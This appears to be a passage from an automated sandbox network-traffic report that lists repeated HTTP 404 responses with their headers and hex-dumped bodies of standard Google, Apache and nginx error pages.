              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1566Date: Wed, 24 Apr 2024 05:26:52 GMTConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 7
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1566Date: Wed, 24 Apr 2024 05:26:55 GMTConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 7
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 05:27:02 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 05:27:05 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 05:27:08 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 05:27:10 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 24 Apr 2024 05:27:16 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 24 Apr 2024 05:27:20 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 24 Apr 2024 05:27:23 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 